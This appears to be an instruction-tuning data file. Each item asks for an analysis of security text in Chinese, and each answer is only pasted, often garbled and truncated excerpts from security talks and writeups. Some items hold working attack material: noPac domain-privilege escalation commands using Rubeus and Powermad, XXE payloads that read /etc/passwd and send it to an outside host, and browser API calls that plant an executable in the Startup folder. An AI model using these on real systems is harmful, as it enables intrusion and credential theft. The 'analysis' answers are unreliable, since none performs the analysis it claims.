{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n简而言之用户可以创建一个机器账户机器账户改名为dc然后申请TGT然后把自己改 名然后DC在TGS_REQ时会找不到这个账户就会以自己的密钥加密TGS然后就得到了一 个高权限的ST 利用过程 测试账户为普通域账户 检查目标是否受到影响 1 Rubeus.exe asktgt /user:labs /password:abc123! /domain:ssosec.lab /dc:SSO DC.ssosec.lab /nopac /nowrap 在无pac时和有pac时票据大小明显不同 尝试攻击(域用户默认可以新建机器账户) 新增机器帐号使用powermad 1 NewMachineAccount MachineAccount TestSPN Domain ssosec.lab DomainCont roller SSODC.ssosec.lab Verbose 清除SPN信息 1 SetDomainObject \"CN=TestSPN,CN=Computers,DC=ssosec,DC=lab\" Clear 'servi ceprincipalname' Verbose 更改账户名称 1 SetMachineAccountAttribute MachineAccount TestSPN Value \"SSODC\" Attri bute samaccountname Verbose 请求TGT 1 Rubeus.exe asktgt /user:SSODC /password:abc123! /domain:ssosec.lab /dc:SS ODC.ssosec.lab /nowrap 更改回原属性 1 SetMachineAccountAttribute MachineAccount TestSPN Value \"TestSPN\" Att ribute samaccountname Verbose 请求票据 1 Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:SSODC.ssosec.la b /self /altservice:LDAP/SSODC.ssosec.lab /ptt /ticket:[TGT] 即可DCsync 源码修改如下https://github.com/GhostPack/Rubeus/pull/105/files 自动化如下https://github.com/cube0x0/noPac 扩展各种域外打法利用SPN特性绕过EDR对于票据的检测", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCyber-hijacking Airplanes: Truth or Fiction? Dr. Phil of Bloomsburg University @ppolstra http://philpolstra.com Captain Polly of University of <redacted> @CaptPolly Why This Talk?  Lots of bold claims concerning the feasibility of cyber-hijacking  Bold claims get lots of press  Most people don't know enough to evaluate these claims  Whether you feel safer or even more scared should be based on facts Who is Dr. Phil  You may know me as a hardware hacker, but I'm also...  Holder of 12 aviation ratings, all current, including:  Commercial Pilot  Flight Instructor  Aircraft Mechanic  Inspection Authorization holder  Avionics Technician  Have thousands of hours of flight time  Aircraft builder  Have worked on the development of avionics found in modern airliners  Have access to airliner manuals, current and former airline pilots Who is Captain Polly  Former airline pilot for a major US carrier  Thousands of hours in airliners and small aircraft  Aviation professor  Head of college simulator program  Spouse of a current airline pilot What you will learn  How some of the common aircraft systems really work, including:  ADS-B  ADS-A  ACARS  Transponders  Collision avoidance  GPS  Autopilots  Avionics buses and networks  Attacks being presented by others Some commonly discussed attacks  Hacking into the avionics via the entertainment network  Hacking ADS-B  Hacking engine systems  Hacking ACARS Let's get this out of the way to start  You cannot override the pilot  All aircraft feature unhackable mechanical backup instruments  You can affect the autopilot operation  If pilot(s) notice they will disconnect  Anything you attempt will likely result in alerts Attacking avionics networks  Older aircraft use ARINC 429 networks  Not connected to anything useful  Require specialized hardware  Newer aircraft use a modified version of Ethernet known as ARINC 664 or AFDX ARINC 664 and AFDX  Built on Ethernet, but...  Can't just start sending packets  Never wireless  Some security in pla", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n洞态IAST与黑盒白盒 共建DevSecOps 01 02目录 1> IAST检测原理 2> 洞态IAST架构设计 3> 灰盒黑盒白盒共建DevSecOps 4> 部署与落地 IAST检测原理 03 03 IAST检测原理 IASTInteractive AST交互式扫描器高频高效无脏数据 应用运行 态分析 污点跟 踪算法 准确率高 效率高 无脏数据*  原理  效果 覆盖度完整 03 IAST检测原理 污点跟踪算法 不可信数据采集 不可信数据预处理 不可信数据传播图 数据调用链路查找 decode id _jspService put id id getParameter exec cmd->id decode _jspService put id getParameter exec cmd->id id id decode _jspService put id getParameter exec cmd->id id id decode _jspService put id getParameter exec cmd->id id id 洞态IAST架构设计 04 04洞态IAST架构设计 整体架构 类型 架构 分析 一般IAST 重Agent端+轻服务端 数据监听和漏洞检测全部在Agent端完成 1.需频繁升级Agent端 2.未检测出漏洞的Agent端数据直接丢弃若产品检测能 力升级需联系功能测试团队重新发起测试 3.无法实现跨请求关联分析 洞态IAST 轻Agent端+重服务端 Agent端仅实现数据监听漏洞检测全部在 服务端完成 1.Agent端代码和逻辑简单单点故障率更低极少升级 2.所有数据保存在服务端可在服务端直接进行回归测试 3.服务端可动态加载检测引擎并可实现跨请求关联分析  更低的使用成本及更强大的检测能力 04洞态IAST架构设计 部署架构 灰盒黑盒白盒共建 DevSecOps 05 共建DevSecOps 什么是DevOps 从字面上来理解DevOps 只是Dev开发人员+Ops 运维人员实际上它是一组过程方法与系统的统称 DevOps目前并没有权威的定义DevOps 强调的是高效组 织团队之间如何通过自动化的工具协作和沟通来完成软件的 生命周期管理从而更快更频繁地交付更稳定的软件 共建DevSecOps 安全如何更好的加入  DevOps并非旨在以牺牲安全性为代价来最大化速度  安全去适应特性简单快捷持续  在CI-自动化测试环节引入安全检查Sec Sec嵌入流程 安全不是流程的关卡而是齿轮串联起整个生命周期 共建DevSecOps IAST在DevSecOps中是如 何工作的 方式一先白盒审计覆盖率高后灰盒接入 初步解决误报问题黑盒针对性扫描再次确认避免脏数据 与性能压力最终上报人工确认 方式二若不介意性能压力问题三者同时进行三 者结果匹对最终上报人工处理 自动化测试+灰盒 白盒代码检查 代码构建 黑盒漏扫 本地功能开发 发送通知 上线 上传结果 PR MR CI流程 CI流程 GitHub Action DevOps 人工验证 共建DevSecOps 持续提升IAST检测能力 灰盒做 DevOps 中的同步检测 黑盒白盒做旁路检测/辅助检测 持续运营提升 IAST 的检测能力 实现自动化的检测并保证检出率准确率 DevSecOp s 灰盒 黑盒 白盒 部署与落地 06 06 部署与落地 洞态IAST部署 Server端部署 Agent端部署  docker  K8s  Manifest  K8s - helm  Base Docker Image  K8s initContainer 洞态IAST官方文档https://doc.dongtai.io/zh/ 06 部署与落地 DongTai-Agent-Java 如何集成到 DevOps 洞态IAST官方文档https://doc.dongtai.io/zh/ Java Agent 在 GitHub Action 及 DevOps 流程中的建议启动命令 java -javaagent:/path/to/agent.jar -Dproject.create=true - Dproject.name=WebGoat -Dproject.version=8.2 -Dresponse.length=1000 - Diast.server.mode=local -jar app.jar 需求 在每次提交代码时自动将靶场的测试数据存入特定的项目 特定的版本中方便直接根据项目及版本进行数据的对比分析 06 部署与落地 同程IAST的推广  发挥安全的主动性主动去贴合业务流程  培训和文章推广在公司内部开展周期性的安全培训和 安全发文介绍IAST  根据发现的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhen Lawyers Attack! - Dealing With the New Rules of Electronic Discovery John E. Benson, Esq. A Companion to the Presentations Given at Blackhat USA 2008 and DEFCON 15 August 2008 Authors Note I hope that my talks and these materials help alleviate some of the confusion that has been created by the advent of electronic discovery. I chose to create this handout instead of posting my slides because they hold little value on their own. I am of the firm belief that presentations are conversations with the audience and that slides should enhance the experience, not be a substitute for it. I hope that this material will serve as a worthwhile supplement to our conversation. This is not intended to be an academic paper nor the definitive text on electronic discovery in any way (as you can see by the lack of references) and certainly shouldnt be relied upon for any kind of legal advice. This is merely a collection of the major points which I believe everyone should understand after participating in my presentation. If you have any questions, please feel free to contact me at john@john-benson.com. The Current Environment of Law and Technology Of all the talks which Ive either participated in or observed which involve the crossroads of law and technology, one common theme stands out amongst all others: frustration at the lack of guidance relating to the law of technology. Whether it be the standard for information which is not deemed to be reasonably accessible under the rules of civil procedure or the applicability of the fourth and fifth amendments to the use of encryption, the answer is consistently that we dont know. This response can come as a real surprise, especially considering the consistent pattern amongst attorneys of having an answer for just about everything. The reasons for this ambiguity will become clear as we examine the nature of the common law system, as will the conclusion that these ambiguities have little chance of being cleared up any time soon. Progress, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLets Sink The Phishermens Boat! Teo Sze Siong F-Secure Corporation teo.sze.siong@f-secure.com BE SURE! Lets ets ets ets Sink ink ink ink The he he he Phisherm hisherm hisherm hishermeeeens ns ns ns Boat oat oat oat!!!! Teo Sze Siong teo.sze.siong@f-secure.com Abstract: In recent years, the boom of e-commerce has changed the way people do business and manage their money via online banking. This technology wave has driven banks to invest huge amount of dollars in security infrastructure to protect their daily business operations and to increase their customers' confidence towards them. However, the paradigm has now shifted to the client side attacks as most users are unguarded and vulnerable against cyber attacks which are launched either through technical perspective or social engineering means. Many users still do not understand the risk that they face even when they are using their own trusted computers to perform online banking protected with 2- factor authentication security. In this paper, an advanced form of phishing attack will be discussed to show the risk how criminals might steal the entire fund from an online banking account protected with daily transaction limit and bypassing the 2-factor authentication system. This type of attack is able to work in stealthy mode without showing any theft symptoms in the bank account balance to keep the victims in the dark. Challenges and limitations encountered by the existing phishing detection techniques will be also identified and reviewed to understand the applicability of each technique in different scenarios. As a step taken to combat phishing attacks, the concept of 'website appearance signature' will be presented and explained how this concept can be applied to detect unknown phishing websites. This has been a great challenge in the past since most phishing website detection tools verify the reputation of a website using a database of blacklisted URLs. In addition, a Proof-Of-Concept application employing the 'we", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuild Your SSRF Exploit Framework SSRF @ringzero KNOW IT  SSRF  SSRF  SSRF HOW   SSRF  HACK IT  SSRF   Web Interface KNOW IT, SSRF? http://10.10.10.10:8080/manager/images/tomcat.gif KNOW ITSSRF 80 & 8080 SSRF_Interface Redis server APP server HTTP server SSRF  ( FingerPrint )  {Payload}  DOS( Keep-Alive Always )  users / dirs / files SSRF Request MongoDB MemCache Redis-Server 100%  OpenSSL  (Cookies & User:Pass) OpenSSL  TSL SSL OpenSSL HELLO  WEB SERVER Cookies, USER & PASS ,? !!! 1024* DOS KNOW IT, SSRF  SSRF  ( Upload from URL, Import & Export RSS feed)  (OracleMongoDBMSSQLPostgresCouchDB)  Webmail (POP3/IMAP/SMTP)  (ffpmg, ImageMaic, DOCX, PDFXML) -> SSRF  Upload from URL  Discuz!  Import & Export RSS feed  Web Blog  XML  Wordpress xmlrpc.php XML -> SSRF  XXE  DTD  XLST -- XML XSLT Processor (Saxon) XSLT Template XML Output Files XML Fuzz Cheatsheet ()  DTD Remote Access  <!ENTITY % d SYSTEM \"http://wuyun.org/evil.dtd\">  XML External Entity  <!ENTITY % file system \"file:///etc/passwd\" > <!ENTITY % d SYSTEM http://wuyun.org/file?data=%file\">  URL Invocation  URL <!DOCTYPE roottag PUBLIC \"-//VSR//PENTEST//EN\" http://wuyun.org/urlin\"> <roottag>test</roottag>  XML Encryption  XML <xenc:AgreementMethod Algorithm= \"http://wuyun.org/1\"> <xenc:EncryptionProperty Target= \"http://wuyun.org/2\"> <xenc:CipherReference URI= \"http://wuyun.org/3\"> <xenc:DataReference URI= http://wuyun.org/4\"> XML Fuzz Cheatsheet  Web Services  XML Signature  XML <Reference URI=http://wuyun.org/5\">  WS Policy  SOA WS <To xmlns=http://www.w3.org/2005/08/addressing\">http://wuyun.org/to</To> <ReplyTo xmlns=\"http://www.w3.org/2005/08/addressing\"> <Address>http://wuyun.org/rto</Address> </ReplyTo>  From WS Security  JAVA WEB <wsp:PolicyReference URI=http://wuyun.org/pr\">  WS Addressing  Web Services <input message=\"wooyun\" wsa:Action=\"http://wuyun.org/ip\" /> <output message=\"wooyun\" wsa:Action=\"http://wuyun.org/op\" /> XML Fuzz Cheatsheet   WS Federation  Web Services <fed:Federation FederationID=\"http://w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 搭建小型域环境 ## VMware or Virtualbox - 在主机上设置具有DHCP服务的网络 - 启动您在主机上运行的DHCP服务 - 如果您使用的是ESXI或其他类型的虚拟机管理程序您可能知道咋整 ## 安装VM 对于本次实验需要安装一些Windows主机和服务器可以在[此处](http://windowsiso.net/)获取Windows ISO 并以试用模式运行除非您想创建有漏洞的计算机否则`Architechture``Service Pack`和补丁级别对于实验环境并不重要这将在以后添加Kali Linux可以从他们的官网下载 将以下镜像安装在VM上 ``` Windows 7 Windows 8 Windows 10 Windows Server 2012 R2 Kali Linux ``` 为每台机器提供至少2个vCPU2 GB RAM和足够的存储空间请记住将VM的网络适配器设置为您创建的仅主机网络请记住还要在Kali VM设置中添加适配器并确保它从DHCP服务器获取IPping测试是否连通 在所有帐户上设置相同的密码因为它们将是主机上的本地管理员在服务器上设置一个更强的密码该密码将设置为域管理员DA ## 在域控制器上创建一个域并添加一些用户 [域控设置教程](https://social.technet.microsoft.com/wiki/contents/articles/22622.building-your-first-domain-controller-on-2012-r2.aspx) - 在Server 2012 R2计算机上创建域 - 正确设置时间很重要 - 将其设置为域控制器DC - [在域中创建三个用户帐户并给他们简单的名称和密码如用户1密码1](https://msdn.microsoft.com/en-us/library/aa545262.aspx) - 设置静态IPDNS指向127.0.0.1 ## 将主机和用户添加到域 > 必须为所有主机执行这些步骤W7W8和W10 - 在所有主机上以管理员帐户登录 - 正确设置时间重要 - 禁用Windows Defender和Windows防火墙 - 启用网络共享 - 将DNS设置设置为指向DC的IP - 将计算机名称更改为简单一点别用中文 - 将主机添加到域 - 将`域用户组`添加到管理员组 `net localgroup administrators /add \"DOMAIN\\Domain Users\"` - 要确认已添加请运行您应该看到`域用户`已添加成功`net localgroup Administrators` - 登录您之前在工作站上创建的每个域用户以DA身份登录 - ping测试一下所有机器以确保一切正常Ping Kali和主机名都行", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021年7月26日 群精华总结 概述 问题1创建服务做自启动的时候出现占位程序接收到错误数据的错误 问题2powershell加载dll反射执行错误 问题3openfire管理员账号密码在哪儿 问题4怎么查询域管理员在域内哪台机器上登录了 问题5想问下免杀里面申请到内存后((void(*)())exec)();这个是啥意思呢 问题1创建服务做自启动的时候出现占位程序接收到错误数据的错误 解决复制sc.exe到其他目录然后重命名sc.exe再执行创建服务解决问题 问题2powershell加载dll反射执行错误 解决Add-Type -LiteralPath \"c:\\xxx\\ddd.dll\" 问题3openfire管理员账号密码在哪儿 解决再数据库中文章和工具如下 https://blog.csdn.net/vcwanglailing/article/details/72494439 https://github.com/jas502n/OpenFire_Decrypt 问题4怎么查询域管理员在域内哪台机器上登录了 解答 1. sysinternals工具集里面的PsLoggedon.exe 2. 大部分是使用session枚举的哪几个APINetSessionEnum这个在域内动作很大的很容易被 发掘相关的工具很多建议学习bloodhound 3. netview 试试这个工具 问题5想问下免杀里面申请到内存后((void(*)())exec)();这个是啥意思呢 这个google以下分析文章很多例如https://www.macchiato.ink/hst/bypassav/void/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Journey: Chapter II (web/re, 384+31 pts, 5 solves) The source of `admin.html` suggests that we are after an `admin-tool` binary: ```html <div style=\"margin-top: 20px\"> Don't forget to practice remembering your Security Key PIN code with the ./admin-tool tool! </div> ``` An arbitrary file read would be nice. One endpoint is interesting in this regard: ```javascript app.get('/share', async function (req, res) { if (!req.session.username) res.send({ err: 'not logged in' }) const favList = favDb.get(req.session.username) if (!favList || favList.length === 0) res.send({ err: 'favorites list is empty' }) const result = {} for (const favPath of favList) { const [type, name] = path.relative(CONTENT_DB_PATH, favPath).split(path.sep) result[type] = result[type] || {} result[type][name.replace(\".txt\", \"\")] = fs.readFileSync(`${CONTENT_DB_PATH}/${type}/${name}`, \"latin1\") } const favId = crypto.randomBytes(8).toString(\"hex\") await db.put(`fav_${favId}`, result) favDb.set(req.session.username, []) res.send({ favId }) }) ``` Note that, even though the database stores paths, the endpoint deconstructs the path manually, and then assembles it back together. Let's take a closer look at how the paths get inserted into the database. ```javascript app.get('/favorite', async function (req, res) { if (!req.session.username) res.send({ err: 'not logged in' }) const { type, name, unfav } = req.query if (type !== \"book\" && type !== \"quote\") res.send({ err: 'invalid type' }) if (name.includes(\"/\") || name.includes(\"..\")) res.send({ err: 'invalid name' }) const itemPath = `${CONTENT_DB_PATH}/${type}/${name}.txt` if (!fs.existsSync(itemPath)) res.send({ err: 'not found' }) const favs = favDb.get(req.session.username) || [] if (unfav) favs = favs.filter(x => x !== itemPath) else favs.push(itemPath) favDb.set(req.session.username, favs) res.send({ success: true }) }) ``` Damn, path traversal is detected and rejected. Except... does `res.send` end the execution of the function? A quick local tes", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 记次审计时遇到的加密分区解密 前 件系统分析 件系统解密 最近拿到了个商业产品的qcow2 镜像 准备试试代码审计 先qemu-img 转换成vmdk 镜像 转换遇到错误 上搜索只有个其他项的issue 没有解决案 阅读qemu源代码 发现是在2017-02-15版本引了这个特性 https://lists.gnu.org/archive/html/qemu-devel/2017-02/msg03173.html 发现可以使2016年的旧版qemu完成转换 https://qemu.weilnetz.de/w64/2016/ 转换完成使vm启动 准备进grub修改root密码 发现grub使密码验证 准备使diskgenius载镜像删除grub密码 前 Plain Text 复制代码 qemu-img convert -f qcow2 123.qcow2 vmdk 123.vmdk 1 Plain Text 复制代码 bitmaps_ext: Invalid extension length: Unknown error 1 2 载镜像后如下图所示 除引导分区外 其他分区的件系统不能正常识别 ci 是个 LINUX LVM的卷组 通过前缀魔数判断root卷件系统为 XFS diskgenius 不持XFS件系统 所以只能使其他法挂载读写的内容 继续看其他分区 发现app home 分区与其他分区件系统不样 有着LUKS的标记 件系统分析 3 经过搜索发现这是种LINUX上的硬盘加密案 Linux Unified Key Setup 使了AES加密 需要秘钥才能解密 既然可以正常进系统,那就说明秘钥是储存在本地的. 我们只要寻找系统分区的挂载配置就有可能找到秘钥. 准备台可以正常使的linux虚拟机. 这使了台 kali 件系统解密 4 将要挂载的硬盘添加到虚拟机中 先挂载 LINUX LVM卷组 vgscan 扫描卷组 vgchange -ay 卷标签 (激活卷组) 5 成功挂载卷 因为root分区没有加密所以直接挂载他 新建个录 挂载root分区 6 mount -t xfs /dev/mapper/cl-root /tmp/temfs/ 成功挂载root分区 现在可以直接对root分区进读写操作了 可以修改密码直接进系统读取解密后分区的件 但是不能步于此 既然遇到了这种特殊情况 就要学习下解密luks分区 在查了些资料后 发现解密法常简单 第步先在root分区寻找分区挂载的配置件 可以在/etc/crypttab 件中找到于分区解密的key件位置 Plain Text 复制代码 /etc/fstab 启动分区挂载 /etc/crypttab 分区解密 1 2 7 安装luks命令具 使命令解密分区 成功解密分区 将这个mapper挂载到个录 mkdir /tmp/atrustapp/ mount -t xfs /dev/mapper/app /tmp/atrustapp/ 到这步就完成了解密 其他分区可按照这种法使对应秘钥单独解密 Plain Text 复制代码 cryptsetup luksOpen 被加密的分区 --key-file 秘钥件 cryptsetup luksOpen /dev/mapper/cl-app --key-file /tmp/temfs/etc/.appconf/.abcde app 1 2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPHYSICAL ACCESS CONTROL SYSTEMS Are you protected by two screws and a plastic cover?...... Probably! Zac Franken Defcon 15 What we are going to cover:  Overview of physical credentials  Brief overview of biometric systems  Biometric worked example  Demo of attack Basic system Anti-Passback system Physical Credential Technologies  Magnetic Strip Card  Wiegand Card  Proximity Card  Barium Ferrite Card  Concealed Barcode Card  Smart Cards Concealed Barcode  As crappy as it sounds  Regular barcode obscured by IR transparent material (a la Remote control)  Just Fucking Embarrasing Magnetic stripe  Normally 3 tracks  High Coercivity- 4,000 Oersted  Low Coercivity- 300 Oersted  Cards are read by an exposed read head in the reader  High security cards can mean simply ofsetting the track Clock & Data Protocol  3 Wires required: Clock, Data & Ground  Standard output from a mag stripe reader Clock & Data Barrium Ferrite  Tends to use an insertion reader  Card contains discrete magnetic domains  Normally encoded in fridge magnet type material  This was the original Card Key Wiegand card  Special alloy wire is processed in such a way to create two distinct magnetic regions in the same piece of wire when passed over a magnetic field  Wire is embedded in the card in a distinct order to create an individual code  Each Wiegand pulse is translated to a digital 0 or 1 depending on wire location Wiegand card Wiegand Effect  When Wiegand wires go by a magnet they store the energy from the magnet  If the wire is passed by an opposite polarity magnet, the wire releases the energy  If a coil is place near the wire as it releases the energy, you can convert the energy into an electronic pulse. Wiegand Electrical protocol  3 wires required: Binary 1, Binary 0, Ground Look familiar? Real Wiegand Data Wiegand format  0s and 1s are divided into bit fields known as Wiegand format  26 bit is a universal format  Most access card manufacturers have proprietary formats which they sell at additional ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从WEB脚本漏洞到客户端应用的 远程命令执行 @gainover XSSCSRFSQLi  水稻microRNADNA methylation  关于我 昵称 Gainover 团队 PKAV WEB安全团队 双螺旋安全实验室 标签前端开发十年生物乌云WEB安全 Javascript VBscriptFlash actionscript .. 一些老案例  浏览器 external API 设计不当 + 特权域边界绕过 攻击页面 -> XSS -> se.360.cn -> Install('ExtWebMail','1.1.0. 1013','360邮件通','http://www.wooyun.org/ExtWebmail.zi p','3.1.0.8') (2010年) ActiveX 接口设计不当 2007 Browser Bug Hunting in 2012 Roberto Suggi Liverani / Scott Bell  特权域 mx:// maxthon.io 文件操作 maxthon.program 执行程序 攻击页面 浏览历史 RSS 功能 书签功能 XSS HITB2012  应用程序 WEB脚本 功能接口 设计缺陷 命令执行 ActiveX 控件 扩展浏览器external对象 注入自定义功能对象 XSS CSRF URL跳转 SOP Bypass .. 没有FUZZ没有overflow  真相是我不擅长 一些现在的案例 浏览器 作为用户的上网入口 大陆互联网厂商争相抢夺 陆续加入中 . 这些浏览器占有大量的市场份额 为什么要研究这些浏览器 以安全之名的浏览器360安全浏览器猎豹安全浏览器 HITCON2012大陆浏览器安全 更多的浏览器是为用户提供更好的功能与体验 他们的宣传口号往往是 他们往往能更换 各种漂亮的皮肤 他们往往提供了丰 富的浏览器扩展 他们往往还是 双核浏览器 然而一些安全问题来了 更换皮肤的功能实现 http://xxx.browser.com/skin browser://skin/ 特权域 浏览器内部 功能API 下载皮肤 写入磁盘 安装皮肤 搜狗浏览器 window.external.SkinCall(\"install\", \"cmd.exe\", 0, \"http://hongmei.me/cmd.exe\", \"instThmemeCallback\"); 皮肤地址 写入磁盘的皮肤名称 安装成功后的回调函数 cmd.exe  ../../../开始菜单/程序/启动/cmd.exe (WooYun-2013-37211) 特权域http://*.sogou.com/ XSS window.external.StartRequest(1,\"bdbrowser.skin.download\",\"回调函数\",\"{\\\"nam e\\\":\\\"cmd.exe\\\",\\\"url\\\":\\\"http://192.168.1.105/testbaidu.exe\\\"}\",window,\"\") 百度浏览器 (WooYun-2014-80438) 皮肤地址 cmd.exe  ../../../开始菜单/程序/启动/cmd.exe 写入本地的皮肤名称 特权域 哪些域可以调用 external.StartRequest ? http://xapp.baidu.com/ 与 bdbrowser:// 均找不到XSS  data:  blob:  var data='<script>执行特权命令</script>'; var blob=new Blob([data],{\"type\":\"text/html\"}); (function(){ var iframe=document.createElement(\"iframe\"); iframe.src=URL.createObjectURL(blob); document.body.appendChild(iframe); })() 百度浏览器 (WooYun-2014-80910) window.external.StartRequest(1,\"bdbrowser.skin.download\",\"回调函数\",\"{\\\"nam e\\\":\\\"cmd.exe\\\",\\\"url\\\":\\\"http://192.168.1.105/testbaidu.exe\\\"}\",window,\"\") 皮肤地址 写入本地的皮肤名称 cmd.exe  ../../../开始菜单/程序/启动/cmd.exe cmd.exe  ..//..//..//开始菜单/程序/启动/mm.js 皮肤地址  必须为 http://*.baidu.com/ 域名下的资源文件 找一个文件上传 No, 只需要一个没有过滤", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nToken Kidnapping's Revenge Author: Cesar Cerrudo (cesar.at.argeniss.dot.com) Argeniss  Information Security & Software Table of contents Table of contents..................................................................................................................................2 Abstract.................................................................................................................................................3 Introduction..........................................................................................................................................4 Some theory..........................................................................................................................................5 The Tools..............................................................................................................................................6 Finding the vulnerabilities....................................................................................................................6 Bypassing Microsoft fix for Token Kidnapping on Windows 2003 and XP.....................................10 Preventing exploitation.......................................................................................................................13 Conclusion..........................................................................................................................................14 Special Thanks....................................................................................................................................15 About the author.................................................................................................................................16 References..........................................................................................................................................17 About Argeniss.............................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS U B O R N E R A Windows Bribery for Invisible Persistence Sebastián Castro @r4wd3r R 4 W S E C . C O M Singapore August 25 - 26, 2022 R 4 W S E C . C O M  @r4wd3r S U B O R N E R W H O A M I Username r4wd3r Full User name Sebastián Castro Comment Infosec nerd, stuff breaker ~10y Users comment Terrible at MS Paint :( First logon 1993/05/03 23:56 User profile Ph. D. CSE Student <at> UCSC PSO R&D Co-op <at> AMD Presenter <at> BlackHat, BSides, Derbycon, Romhack, SEC-T R 4 W S E C . C O M  @r4wd3r S U B O R N E R I, Sebastian Castro, solely and exclusively own the property rights of the research Suborner: A Windows Bribery for Invisible Persistence. I hereby do not concede any property rights to my previous, current and future employers unless I voluntarily choose to transfer such property, in total, or in part. The opinions expressed here are my own and not necessarily those of my employers. D I S C L A I M E R R 4 W S E C . C O M  @r4wd3r S U B O R N E R A C K N O W L E D G E M E N T This is only possible thanks to:  Family and friends  Research done before by great minds (Mimikatz, Impacket, etc.)  Microsoft Team  Stack Overflow & Infosec community. You all rock! R 4 W S E C . C O M  @r4wd3r S U B O R N E R A G E N D A Why? How? Whats next? What? Show me! R 4 W S E C . C O M  @r4wd3r S U B O R N E R A G E N D A Why? How? Whats next? What? Show me! R 4 W S E C . C O M  @r4wd3r S U B O R N E R how to create invisible user windows B A C K I N T H E D A Y . . . R 4 W S E C . C O M  @r4wd3r S U B O R N E R how to create invisible user windows I wasnt lucky :( B A C K I N T H E D A Y . . . R 4 W S E C . C O M  @r4wd3r S U B O R N E R H O W A B O U T N O W ? R 4 W S E C . C O M  @r4wd3r S U B O R N E R R 4 W S E C . C O M  @r4wd3r S U B O R N E R R 4 W S E C . C O M  @r4wd3r S U B O R N E R R 4 W S E C . C O M  @r4wd3r S U B O R N E R W H A T A B O U T A T T A C K E R S ? Identity Manipulation External Implants R 4 W S E C . C O M  @r4wd3r S U B O R N E R Reference: https", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# OpenResty实现waf ## 安装与使用 ``` # 操作系统centos7 # 解决依赖 yum install gcc.x86_64 gcc-c++.x86_64 openssl-devel.x86_64 pcre-devel.x86_64 -y # 下载OpenResty wget https://openresty.org/download/openresty-1.13.6.2.tar.gz # 安装OpenResty tar -xf openresty-1.13.6.2.tar.gz && cd openresty-1.13.6.2 ./configure gmake && gmake install # 启动服务 /usr/local/openresty/nginx/sbin/nginx # 停止服务 /usr/local/openresty/nginx/sbin/nginx -s quit # 测试OpenResty vim /usr/local/openresty/nginx/conf/nginx.conf ``` ``` location /hello { default_type text/html; content_by_lua_block { ngx.say(\"hello world\") } } ``` ![openresty-waf-1](https://github.com/bloodzer0/ossa/raw/master/application-security/security-defense/img/openresty-waf-1.png) ``` # 重新载入配置文件 /usr/local/openresty/nginx/sbin/nginx -s reload # 访问页面http://10.10.10.5/hello ``` ![openresty-waf-2](https://github.com/bloodzer0/ossa/raw/master/application-security/security-defense/img/openresty-waf-2.png) ## 实现waf ``` # 下载waf git clone https://github.com/unixhot/waf # 复制到对应目录 mkdir /usr/local/openresty/nginx/conf/waf cp -r waf/waf/* /usr/local/openresty/nginx/conf/waf # 创建waf日志目录 mkdir /tmp/waf-log && chmod 777 /tmp/waf-log # 修改waf配置修改日志目录 vim /usr/local/openresty/nginx/conf/waf/config.lua ``` ``` config_log_dir = \"/tmp/waf-log\" ``` ### 配置waf ``` vim /usr/local/openresty/nginx/conf/nginx.conf ``` ``` lua_shared_dict limit 50m; lua_package_path \"/usr/local/openresty/nginx/conf/waf/?.lua\"; init_by_lua_file \"/usr/local/openresty/nginx/conf/waf/init.lua\"; access_by_lua_file \"/usr/local/openresty/nginx/conf/waf/access.lua\"; ``` ![openresty-waf-3](https://github.com/bloodzer0/ossa/raw/master/application-security/security-defense/img/openresty-waf-3.png) ``` # 重启服务 # 访问测试页面http://10.10.10.5/hello.sql ``` ![openresty-waf-4](https://github.com/bloodzer0/ossa/raw/master/application-security/security-defense/img/openresty-waf-4.png) ## waf的说明 ### 规则说明 waf规则文件目录/usr/local/openresty/nginx/conf/waf/rule-config 规则文件说明可以在相应的规则中添加对应的值 ``` args.rule参数值规则 blackip.rule黑名单IP c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDISCLAIMER  This publication contains references to the products of SAP AG. SAP, R/3, SAP NetWeaver and other SAP products.  Products and services mentioned herein are trademarks or registered trademarks of SAP AG in Germany, in the US and in several other countries all over the world.  SAP AG is neither the author nor the publisher of this publication and is not responsible for its content. The SAP Group shall not be liable for errors or omissions with respect to the materials. Vicxer, Inc. Is a registered Trademark. All rights reserved. Reproduction of this presentation without authors consent is forbidden. JOR DAN SANTARSIERI VICXERS FOUNDER Originally devoted to Penetration Testing, Vulnerability Research & Exploit writing, discovered several vulnerabilities in Oracle, SAP, IBM and many others. Speaker and trainer at Black-Hat, OWASP-US, Hacker Halted, YSTS, Insomnihack, AusCERT, Sec-T, RootCon, Ekoparty, etc. I started researching ERP Software back in 2008. Had the honor to secure more than 1000 SAP implementations all around the globe, including Fortune-500 companies, military institutions and the biggest ONG on the planet. @ J S A N T A R S I E R I 